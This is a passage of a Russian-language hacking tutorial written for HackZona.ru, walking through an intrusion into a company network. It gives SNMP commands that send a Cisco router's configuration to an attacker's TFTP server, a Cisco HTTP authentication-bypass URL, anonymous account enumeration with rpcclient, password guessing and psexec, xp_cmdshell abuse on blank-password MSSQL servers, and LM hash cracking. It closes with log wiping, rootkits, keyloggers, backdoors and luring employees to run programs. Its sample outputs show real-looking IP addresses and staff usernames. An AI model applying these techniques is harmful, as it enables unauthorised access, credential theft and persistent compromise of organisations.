vpn9-1.su29.ru has address 81.200.9.1
vpn-87.su29.ru has address 81.200.1.87
lefutur-215.su29.ru has address 81.200.7.215
lefutur-195.su29.ru has address 81.200.7.195
vpn9-2.su29.ru has address 81.200.9.2
vpn-90.su29.ru has address 81.200.1.90
vpn-88.su29.ru has address 81.200.1.88
auth.su29.ru has address 81.200.0.48
...etc
чтож, достаточно интересно! Мы видим IP адреса определенных компьютеров и их имена, по которым можно определить их функцию в сети данной
компании. Чем это опасно? ну для начала тем, что так можно найти специальные сервера компании. Например ВПН сервер (VPN, virtual private
network), которым пользуются работники фирмы для доступа в корпоративную сеть или же, например, прокси серверы компании. Ну и, соответственно,
новые IP адреса, диапазоны и так далее — тоесть потенциальные «жертвы».
В принципе, насчёт разведки этого хватит. Добавлю только, что еще есть такой сайт как www.fixedorbit.com/search.htm
Принцип работы я описывать не буду. Зайдите и посмотрите сами. По данным, таким как ASN, домен или просто название фирмы, вы сможете снять данные об IP диапазонах, принадлежащих данной фирме.
Теперь, собственно, перейдем к самой атаке. Для начала определимся, что мы можем найти на этих IP диапазонах:
(1) серверы.
(2) рабочие станции.
(3) сетевое оборудование.
(4) другое оборудование.
Серверы бывают в основном либо на базе WinNT (в том числе 2k,2003 и все остальные), либо на базе какого либо из UNIX`ов (чаще всего
встречаются Solaris от Sun Microsystems, потом FreeBSD и конечно же Linux). Как правило, эти компьютеры настроены
относительно грамотно, так как за ними следит администратор. Так что тут всё зависит от его компетентности и объективных
причин (таких как, например, лень). Так же обычно на них стоят какие либо сервисы, к которым открыт доступ и которые представляют из себя
потенциальную «уязвимость».
Рабочие станции — почти всегда на базе WinNT, реже на Win98. На UNIX`ах встречается достаточно редко, настолько
редко что можно сказать что не встречается вообще ;-).Как правило, на них не стоит каких-либо дополнительных приложений
или сервисов. За этими машинами администратор не так активно следит, как за серверами, поэтому часто на таких компьютерах оказываются
такие элементарные вещи, как логин равный паролю, или же просто не стоит патч на уязвимость, о которой уже известно без малого пару лет...
Сетевое оборудование — обычно это роутеры фирмы Cisco. По крайней мере, рассказывать я буду о них, так как от всего
остального толку не особо много. Хотя тут всё зависит от фантазии «злоумышленника»...
Другое оборудование — обычно всякие датчики, индикаторы или сетевые принтеры. Толку от них тоже не особо много.
А теперь я расскажу, как это всё злоумышленник может использовать.
Начну в обратном порядке, по мере возрастания «возможностей».
Другое оборудование — толку от него обычно не особо много, а если и есть — то особо специфический. Например, можно найти машину с
security камерами, показывающими обзор помещения или сетевой принтер. Если от первого еще будет какая-то польза, если вы,
например, хотите «ограбить» данную фирму в «реале» и следить за объектами в ней. То от принтера максимум что вы сможете сделать —
так это напечатать в духе «скрипт кидов» например «я вас поломал, гыгыгы». От данного оборудования есть смысл только если на нем вы
можете как-либо скачать конфигурацию и «вытащить» оттуда loginpassword на администратирование данного устройства, так как эти
loginpassword можно будет попробовать на других компьютерах или устройствах, от которых больше пользы. А учитывая, что администратор
тоже человек, и ему очень хочется поставить везде один и тот же пароль… Ну вы поняли идею. Описывать способы «взлома» я не буду так
как таких устройств большое множество, а встречаются они довольно не часто.
Сетевое оборудование — если это какой-либо тупой «свитч» левой компании то от него толку будет не больше чем от того что написано
абзацем выше. Но если же это более менее «серьезный» роутер от Cisco или кого-либо еще, перед вами открываются большие возможности. Во
первых если вы имеет к такой штуке доступ — и на ней есть telnet то вы можете организовать за его счет «туннелинг» спецальной
программой или просто делать telnet на компьютеры, находящиеся внутри сети фирмы. Вы также можете поднять свой собственный VPN в
своей виртуальной сети и сделать NAT (network address translation) из неё, тем самым вы будете работать с IP адреса роутера. А как
правило, если роутер находится в сети компании (особенно внутренней), он имеет гораздо больший «доступ» к самой сети и в том числе к другим
компьютерам, которые потенциально можно взломать. (Как это сделать конфигурацию не превожу, так как это займет много времени и не
относится к теме статьи). На роутере также можно организовать «снифинг» пакетов, проходящих через него. На роутерах фирмы Cisco это
делается показыванием буффера роутера (командый show buffers) или включением дебага проходящих TCP пакетов (debug ip packet dump),
после этого содержимое пакетов будет выводится на монитор (чтобы увидеть это, надо набрать terminal monitor (включает режим монитора)).
Учтите, если роутер интенсивно используется такой режим, произведет на него DOS. Есть и более технологичные методы снифинга, такие как
пропускание всего трафика через «левый» компьютер со снифером, но это увеличивает конечный пинг и делает «систему» более заметной для
администратора. Взлом роутера фирмы Cisco в основном производится тремя путями
(1) через SNMP
(2) через «сервисы»
(3) через подбор пароля
SNMP — Simple Network Management Protocol. Как видно из названия, это простой протокол для сетевого управления. Сервис этот находится
на 161 порту и работает по UDP. Особенности работы описывать не буду — расскажу только что мы можем с помощью него поиметь. У SNMP есть чтото
вроде «аутентификации» — это community string. Есть два типа community. Это либо READ-ONLY, либо READ-WRITE. С первой мы можем считать
информацию с роутера, определенные данные. Например, название роутера, его uptime и т.д. Бывает полезно например определить «имя»
роутера и попробывать его как READ-WRITE community или как пароль на роутер — иногда проходит. C READ-WRITE community вы как правило
имеете возможность изменять некоторые значения в конфигурации роутера, а также например дать роутеру команду залить его конфигурацию по TFTP
на определенный сервер.
По умолчанию READ-ONLY community это «public» а READ-WRITE это «private».
Так же многие Cisco роутеры имеют «встроенные» community. Это «cable-docsis» и «ILMI».
Вот пример как это выглядит:
bash-2.05b$ snmpget 201.194.164.2 public .1.3.6.1.2.1.1.5.0
system.sysName.0 = OCTET STRING: «lannet-gw»
bash-2.05b$
snmpget программа входит в пакет программ для работы с SNMP. Идентификатор объекта .1.3.6.1.2.1.1.5.0 — это system.sysName.0 — в ней
записано значение «имя роутера». Используя snmpset (если бы community была с правом записи) мы могли бы записать свое имя роутеру,
только это бы нам ничего не дало.
DOWNLOAD: snmpset #.#.#.# ILMI .1.3.6.1.4.1.9.2.1.55.$.$.$.$ s «cisco1.cfg»
UPLOAD: snmpset #.#.#.# ILMI .1.3.6.1.4.1.9.2.1.53.$.$.$.$ s «cisco1.cfg»
вот так можно заливать и сливать конфиг файл роутера на TFTP сервер. Там где #.#.#.# — это IP адрес роутера, а $.$.$.$ — IP адрес
TFTP сервера (учтите под UNIX`ами надо в директории TFTP сервера создать файл с именем cisco1.cfg и присвоить ему chmod a+w)
Вот краткий список SNMP идентификаторов (самые полезные на мой взгляд)
.1.3.6.1.2.1.1.5.0 — Имя компьютера
.1.3.6.1.2.1.1.1.0 — Описание системы
.1.3.6.1.2.1.4.21.1.1 — Таблица роутинга
.1.3.6.1.2.1.6.13 — NETSTAT (используя SNMPWALK)
.1.3.6.1.2.1.1.3 — UPTIME.
Также SNMP часто встречается и на других компьютерах, в том числе UNIX и NT. В UNIX`е максимум интересного что в них можно сделать — это
узнать версию OS через «Описание системы» и получить список активных соединений. В NT у SNMP намного больше «полезных» функций.
Через SNMPWALK можно получить список юзеров на компьютере используя Object ID .1.3.6.1.4.1.77.1.2.25
Например
bash-2.05b$ snmpwalk 63.224.248.114 public .1.3.6.1.4.1.77.1.2.25
enterprises.77.1.2.25.1.1.4.100.101.108.120 = OCTET STRING: «delx» Hex: 64 65 6C 78
enterprises.77.1.2.25.1.1.4.104.111.109.101 = OCTET STRING: «home» Hex: 68 6F 6D 65
enterprises.77.1.2.25.1.1.4.119.111.114.107 = OCTET STRING: «work» Hex: 77 6F 72 6B
enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = OCTET STRING: «Guest»
enterprises.77.1.2.25.1.1.6.67.97.109.101.114.97 = OCTET STRING: «Camera»
enterprises.77.1.2.25.1.1.6.75.101.108.108.105.77 = OCTET STRING: «KelliM»
enterprises.77.1.2.25.1.1.7.73.110.101.116.75.105.116 = OCTET STRING: «InetKit»
enterprises.77.1.2.25.1.1.8.69.120.99.104.97.110.103.101 = OCTET STRING: «Exchange»
enterprises.77.1.2.25.1.1.9.49.83.81.76.65.100.109.105.110 = OCTET STRING: «1SQLAdmin»
enterprises.77.1.2.25.1.1.9.74.111.104.110.82.97.122.111.114 = OCTET STRING: «JohnRazor»
enterprises.77.1.2.25.1.1.10.49.69.120.99.104.97.110.103.101.49 = OCTET STRING: «1Exchange1»
enterprises.77.1.2.25.1.1.10.77.105.107.101.77.117.110.115.111.110 = OCTET STRING: «MikeMunson»
enterprises.77.1.2.25.1.1.11.65.109.98.101.114.72.97.110.115.111.110 = OCTET STRING: «AmberHanson»
enterprises.77.1.2.25.1.1.11.71.114.101.103.71.97.114.108.105.99.107 = OCTET STRING: «GregGarlick»
enterprises.77.1.2.25.1.1.12.65.110.100.114.101.97.82.105.115.110.101.114 = OCTET STRING: «AndreaRisner»
enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = OCTET STRING: «Administrator»
enterprises.77.1.2.25.1.1.13.82.105.99.107.84.101.109.112.108.101.116.111.110 = OCTET STRING: «RickTempleton»
enterprises.77.1.2.25.1.1.14.76.68.65.80.95.65.78.79.78.89.77.79.85.83 = OCTET STRING: «LDAP_ANONYMOUS»
enterprises.77.1.2.25.1.1.15.83.81.76.65.103.101.110.116.67.109.100.69.120.101.99 = OCTET STRING: «SQLAgentCmdExec»
enterprises.77.1.2.25.1.1.17.73.85.83.82.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: «IUSR_MULTISECURE1»
enterprises.77.1.2.25.1.1.17.73.85.83.82.95.77.85.76.84.73.83.69.67.85.82.69.50 = OCTET STRING: «IUSR_MULTISECURE2»
enterprises.77.1.2.25.1.1.17.73.87.65.77.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: «IWAM_MULTISECURE1»
enterprises.77.1.2.25.1.1.17.73.87.65.77.95.77.85.76.84.73.83.69.67.85.82.69.50 = OCTET STRING: «IWAM_MULTISECURE2»
enterprises.77.1.2.25.1.1.19.77.66.83.68.77.48.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: «MBSDM0_MULTISECURE1»
bash-2.05b$
Как мы видим достаточно много всяких разных юзеров, пароли которых не мешает проверить на всякие «qwerty» или «login»=«password».
У роутеров Cisco было в основном две серьезных уязвимости. Это в сервисе finger (можно получить exec доступ на
роутер), а также в сервисе HTTP (можно получить конфигурацию роутера).
Про ошибку в сервисе finger я ничего определенного сказать не могу, так как еще ни разу не удалось проэксплуатировать данную уязвимость. Складывается ощущение, что либо
это вообще какойто миф, либо это было на сверх древних роутерах. А вот второе (http bug) встречается довольно таки часто. Если мы пошлем
роутеру запрос типа ROUTER_IP_ADDRESS/level/16/exec/show/conf то обойдем всю его систему аутентификации (роутеру становится
плохо когда уровень доступа указан выше 15и (максимального)) и скачаем конфигурацию роутера.
C роутерами мы пока закончили, переходим к разбору рабочих станций и серверов на базе Windows NT.
Во-первых, как войти на компьютер на базе Windows NT? В *NT есть сервис «Server». Он по умолчанию всегда включен. Чтобы зайти на *NT
(получить доступ командной строки) нам необходимо по нетбиосу залить свою специальную программу, прописать свой специальный сервис, который
бы эту программу запускал, и запустить её. Все эти операции можно произвести на default установке Windows NT (через порты 139,445).
Как это сделать? Этим способом пользуются программы psexec.exe (www.sysinternals.com пакет утилит pstools) либо пакет DameWare Utilites
(он также позволяет получить GUI доступ к компьютеру, но учтите что этот доступ будет ПАРАЛЕЛЬНО с пользователем, что очень заметно!).
Теперь, ЧТО для этого нужно сделать? Для этого надо иметь логин и пароль с уровнем привелегий Администратора на данный компьютер. Их можно получить простым
перебором паролей по словарю на каждую из учетных записей, имеющихся на компьютере. Как получить «учетки»? Это можно сделать с помощью специального запроса по протоколу нетбиос.
bash-2.05b$ rpcclient -N 63.224.69.197 -c querydispinfo
cmd = querydispinfo
index: 0x1 RID: 0x1f4 acb: 0x210 Account: Admin Name: Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3ea acb: 0x210 Account: Anon000 Name: Desc: Built-in account for anonymous access to the computer
...
index: 0xf RID: 0x3f7 acb: 0x210 Account: Anon013 Name: Desc: Built-in account for anonymous access to the computer
index: 0x10 RID: 0x3f8 acb: 0x210 Account: Anon014 Name: Desc: Built-in account for anonymous access to the computer
index: 0x11 RID: 0x3f9 acb: 0x614 Account: ASPNET Name: ASP.NET Machine Account Desc: Account used for running the ASP.NET
worker process (aspnet_wp.exe)
index: 0x12 RID: 0x3fb acb: 0x210 Account: bwatts Name: Bill Watts Desc: Local Backup Administrator Account
index: 0x13 RID: 0x1f5 acb: 0x615 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x14 RID: 0x3fa acb: 0x210 Account: SQLDebugger Name: SQLDebugger Desc: This user account is used by the Visual Studio
.NET Debugger
index: 0x15 RID: 0x3e8 acb: 0x214 Account: TsInternetUser Name: TsInternetUser Desc: This user account is used by Terminal
Services.
bash-2.05b$
либо через SNMP (способ в разделе роутеров). Также почти на всех компьютерах есть учетка
Administrator. В локализованных версиях операционной системы учетки также локализованны, например на русских компьютерах — по русски
«Администратор» и т.п. В последнее время было опубликовано большое количество различных уязвимостей в компьютерах семейства NT. Тут я описывать
ничего конкретно не буду, так как всё буквально сводится к тому чтобы «скачать эксплоит, скомпилировать, запустить и молиться».
Единственное что отмечу, многие уязвимости, например в RPC работает не только через порт 135 а например и через 1025, но многие
администраторы об этом «забывают» и закрывают только первую группу «любимых» портов (135,139,445). Также хочу отметить что довольно
часто встречаются компьютеры с MSSQL сервером на котором установлен пустой пароль на «sa» аккаунт. Если подключится к серверу с SA
аккаунта — можно выполнять команды cmd шелла через функцию «xp_cmdshell». Самая же главная уязвимость Windows NT на мой взгляд это
ненадежное хранение паролей. Они по умолчанию криптуются NTLM и дублируются LMHASH`ем. А подобрать пароль в виде LMHASH`а не просто
легко, а ОЧЕНЬ легко. Во первых скорость перебора составляет 5милионов комбинаций в секунду (на 3ghz xeon`е), во вторых пароли длиннее
7 символов разбиваются на две пары (7символов каждая), в третьих при шифровке не учитывается регистр букв. А учитывая что при шифровке не
используется SALT — можно проводить атаки типа rainbow (по таблице по приметам схожести подобрать пароль очень быстро). Как правило
сети на основе Windows NT объеденены в ДОМЕНы (Active Directory). Суть в том, что каждый компьютер подключен к одному большому
серверу(контроллеру) и проводит аутентификацию на нём. Вот эти контроллеры и являются основной целью атакующих (если имеешь доступ на контроллер
домена — владеешь всеми компьютерами в домене — легче работать).Следущей целью после контроллера домена являются компьютеры администраторов сети, так как на них может находиться
техническая документация и конфиги разных терминальных программ (например SecureCRT), либо на них можно установить сниферы или кейлогеры и тем самым достичь желаемого. После этого «заражение»
происходит и компьютеров на базе UNIX...
Теперь приступаем к разбору уязвимостей UNIXовых компьютеров. Их в основном ломают если на них стоит старый софт (например древний sshd),
методом описаным выше (через простое ворование конфигов записанных) и подбором паролей (логины пытаются узнать через finger). Если UNIX
например HP-UX с анонимным FTP сервером — можно скачать /etc/passwd и в нём будут пароли (HP-UX не знает про shadow файлы). Многие
солярисы подверженны уязвимости с TTYPROMPT переполнением. Но тут нет впринципе ничего не обычного. Администраторы любят использовать
файл «authorized_keys». Это специальный ключ позволяющий заходить на компьютер «по дружбе», тоесть не спрашивая пароля, а это не есть
хорошо… Также на UNIX`ах частенько ставят простенькие самописные программки, при этом СОВЕРШЕННО не заботясь об аспекте
безопасности. Например при выполнении одного из скриптов в списке процессов можно было увидеть логин и пароль ROOTовые на MYSQL. Еще,
если UNIX компьютер находится в NIS домене (чтото вроде аналога active directory но под юниксы) — то вы можете
получить список всех юзеров с паролям. MySQL — одно из слабых мест компьютеров на UNIX (если разумеется он стоит на нём). Во первых часто
администраторы «забывают» поставить пароль на root в MYSQL, а во вторых пароли в MYSQL шифруются довольно плохо, и возникает ситуация
схожая (хоть и в меньшей степени) с ситуацией с компьютерами на Windows NT (описано выше).
Вот вроде бы и разобрались с основными проблемами разных компьютеров и систем. Теперь же как собственно говоря происходит сама атака?
Тут все зависит от фантазии атакующего. Обычно объект «просканивает» всю сеть на стандартный набор портов, а затем смотрит результаты.
На всех роутерах, WindowsNT и UNIXах пробует применить то, что описано выше. Особенно проверяет компьютеры с портом 80 (http), так как
там могут быть разные дырявые CGI-BIN скрипты или sql-inject или XSS и много других уязвимостей. Проверяются анонимные FTP серверы на
предмет конфигов других систем, а также документаций. Затем если у него чтото получилось взломать — он трёт логи, ставит руткит
(чтобы незаметно ходить и выходить из компьютера) и пытается дальше уже с этого компьютера производить взлом, так компьютеру, находящемуся «в
корпоративной» сети, доступно как правило намного больше, чем простому пользователю из интернета. Дальше тут описывать особо нечего,
это методичный долгий процесс «внедрения». Постоянный поиск новых жертв, предпочтительно днём (больше включенных компьютеров
(надо учесть временной пояс)), проведение «серьезных атак» на внутренние сервера (обычно в выходные так как администраторы дома), и
выжидание того, что принесут «кейлоги и сниферы. После внедрения в сеть, злоумышленник обычно пытается „закрепится“ в ней, делая
»запасные" точки входа, на случай если администратор что-либо найдет.
То есть, основной упор «злоумышленник» делает на получение доступа во внутреннюю сеть фирмы, так как в ней как правило безопасность намного
ниже — потому что к ней не имеют доступ из интернета, и следовательно все системы в ней защищены намного хуже.
А что если «злоумышленнику» не получилось произвести удачную атаку на «периметр»? Тогда он начнет разрабатывать более «сложные» пути
атаки. Это например
(1) Активная атака домашних работников.
(2) Пассивная атака работников.
(3) Выжидание.
Первый способ заключается в том, чтобы сломать компьютер работника этой фирмы, пока он находится ВНЕ сети фирмы (например по модему
через провайдера или по ADSL, подключенный к интернету с домашнего компьютера). После взлома злоумышленник пытается найти логинпароль
для доступа в корпоративную сеть через VPN сервер или другую полезную информацию. Основная сложность заключается в том, чтобы его найти (такой
компьютер). Обычно его находят по логам на каких либо серверах в интернете, finger`у на компьютерах фирмы в интернете (там у логина будет
интернетовский IP адресс) и по аське (некоторые работники честно пишут где работают в «ICQ White Pages»).
Второй способ заключается в том, чтобы тоже сломать компьютер работника, но сделать это ПАССИВНЫМ методом. Тоесть завести бедолагу на
какой либо сайт или убедить запустить какую-либо программу. Сложности здесь заключаются в том, что надо иметь некоторые навыки СИ
(социальной инженерии) чтобы убедить запустить программу или зайти на сайт.
А третий способ — самый неинтересный. Это просто ждать. Ждать пока не появится новая сверх уязвимость и пока никто не успел пропатчится
— воспользоватся ею, либо ждать пока администратор совершит ошибку.
З.Ы.
Компьютеры это плохо! Используйте счёты ;-)
— Специально для HackZona.ru
7 комментариев